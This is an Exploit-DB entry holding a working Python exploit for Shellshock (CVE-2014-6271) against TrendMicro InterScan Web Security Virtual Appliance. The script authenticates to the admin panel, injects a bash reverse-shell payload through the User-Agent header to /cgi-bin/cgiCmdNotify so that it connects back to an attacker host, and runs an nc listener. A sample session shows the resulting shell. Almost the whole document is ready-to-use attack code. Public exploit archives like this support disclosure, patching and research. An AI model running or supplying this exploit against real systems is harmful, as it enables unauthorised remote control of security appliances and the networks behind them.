TrendMicro InterScan Web Security Virtual Appliance - 'Shellshock' Remote Command Injection

EDB-ID:

40619




Platform:

Hardware

Date:

2016-10-21


#!/usr/bin/env python
# TrendMicro InterScan Web Security Virtul Appliance
# ==================================================
# InterScan Web Security is a software virtual appliance that 
# dynamically protects against the ever-growing flood of web 
# threats at the Internet gateway exclusively designed to secure 
# you against traditional and emerging web threats at the Internet 
# gateway. The appliance however is shipped with a vulnerable
# version of Bash susceptible to shellshock (I know right?). An
# attacker can exploit this vulnerability by calling the CGI
# shellscript "/cgi-bin/cgiCmdNotify" which can be exploited
# to perform arbitrary code execution. A limitation of this 
# vulnerability is that the attacker must have credentials for
# the admin web interface to exploit this flaw. The panel runs
# over HTTP by default so a man-in-the-middle attack could be
# used to gain credentials and compromise the appliance.
# 
# $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1
# [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit
# [-] Authenticating to '192.168.56.101' with 'admin' 'password'
# [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA
# [-] exploiting shellshock CVE-2014-6271...
# bash: no job control in this shell
# bash-4.1$ id
# uid=498(iscan) gid=499(iscan) groups=499(iscan)
# 
# -- Hacker Fantastic 
#
# (https://www.myhackerhouse.com)
import requests
import sys
import os

def spawn_listener():
	os.system("nc -l 8080")

def shellshock(ip,session,cbip):
	user_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'}
	cookies = {'JSESSIONID': session}
	print "[-] exploiting shellshock CVE-2014-6271..."
	myreq = requests.get("http://"+ip+":1812/cgi-bin/cgiCmdNotify", headers = user_agent, cookies = cookies)

def login_http(ip,user,password):
	mydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'}
	print "[-] Authenticating to '%s' with '%s' '%s'" % (ip,user,password)
	myreq = requests.post("http://"+ip+":1812/uilogonsubmit.jsp", data=mydata)	
	session_cookie = myreq.history[0].cookies.get('JSESSIONID')
	print "[-] JSESSIONID = %s" % session_cookie 
	return session_cookie

if __name__ == "__main__":
	print "[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit"
	if len(sys.argv) < 5:
		print "[-] use with <ip> <user> <pass> <connectback_ip>"
		sys.exit()
	newRef=os.fork()
    	if newRef==0:
		spawn_listener()
    	else:
		session = login_http(sys.argv[1],sys.argv[2],sys.argv[3])
		shellshock(sys.argv[1],session,sys.argv[4])